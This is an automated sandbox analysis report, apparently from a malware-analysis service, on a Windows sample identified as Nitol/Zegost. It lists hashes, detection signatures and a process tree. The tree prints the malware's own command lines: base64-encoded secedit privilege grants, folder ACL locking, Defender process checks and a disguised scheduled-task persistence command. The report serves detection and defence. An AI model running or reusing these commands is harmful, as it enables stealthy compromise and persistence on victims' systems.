Edit tour

Windows Analysis Report
Gabriel-4.9.exe

Overview

General Information

Sample name:	Gabriel-4.9.exe
Analysis ID:	1581840
MD5:	db868a34edc41156e9aeed55ea44ba97
SHA1:	64eaaf5ecd0116c4d52f5101f16aeee6f212d035
SHA256:	65236234d12a3267d881ed40ab931cca008b93b6a39720cf68dd11cbe1b3865a
Tags:	exeuser-aachum
Infos:

Detection

Nitol, Zegost

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Nitol

Yara detected Zegost

AI detected suspicious sample

Contains functionality to capture and log keystrokes

Contains functionality to modify Windows User Account Control (UAC) settings

Disable UAC(promptonsecuredesktop)

Disables UAC (registry)

Encrypted powershell cmdline option found

Found evasive API chain (may stop execution after checking mutex)

Found stalling execution ending in API Sleep call

Found suspicious powershell code related to unpacking or dynamic code loading

Machine Learning detection for dropped file

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Execution from Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious Program Location with Network Connections

Suspicious powershell command line found

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Contains capabilities to detect virtual machines

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Sleep loop found (likely to delay execution)

Too many similar processes found

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

Gabriel-4.9.exe (PID: 2548 cmdline: "C:\Users\user\Desktop\Gabriel-4.9.exe" MD5: DB868A34EDC41156E9AEED55EA44BA97)

irsetup.exe (PID: 3220 cmdline: "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5572466 "__IRAFN:C:\Users\user\Desktop\Gabriel-4.9.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003" MD5: 2A7D5F8D3FB4AB753B226FD88D31453B)

powershell.exe (PID: 5068 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=3220').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;} MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1492 cmdline: "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MTGHu7b.exe (PID: 424 cmdline: "C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe" MD5: 22AF53F40D27C913642C0572C73A5D87)

powershell.exe (PID: 5852 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 3652 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

powershell.exe (PID: 3688 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 5204 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

powershell.exe (PID: 3472 cmdline: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 7132 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

powershell.exe (PID: 7092 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 4132 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

cmd.exe (PID: 1220 cmdline: cmd /c echo.>c:\inst.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7196 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7252 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

powershell.exe (PID: 7268 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2328 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7304 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7280 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3260 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7808 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5424 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4256 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rundll32.exe (PID: 6336 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)

iusb3mon.exe (PID: 4144 cmdline: C:\ProgramData\program\iusb3mon.exe MD5: 22AF53F40D27C913642C0572C73A5D87)

powershell.exe (PID: 7696 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 8176 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

powershell.exe (PID: 7704 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 8184 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

powershell.exe (PID: 7720 cmdline: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 8156 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

cmd.exe (PID: 7304 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

